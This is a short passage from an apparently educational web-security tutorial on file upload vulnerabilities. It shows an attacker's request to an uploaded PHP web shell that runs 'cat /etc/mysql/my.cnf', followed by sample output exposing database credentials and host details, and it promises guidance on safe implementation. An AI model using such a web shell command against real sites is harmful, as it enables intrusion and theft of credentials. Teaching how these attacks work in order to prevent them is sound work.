File Upload Vulnerabilities

Pretty frightening, right? Now that we've seen one particular way file uploads can make your site vulnerable, we should learn how to implement this kind of functionality safely.

A hacker
cdn.example.com/1a2fe/hack.php?cmd=cat+/etc/mysql/my.cnf
[client] user=admin password=04bf68c99cf4cc23d034d10a8a612549
          db_name=2479fd9059d6d57dd5521c69dc0ba359 host=ec6-115--153.compute-26.amazonaws.com
          port=2323 [mysql] no-auto-rehash connect_timeout=3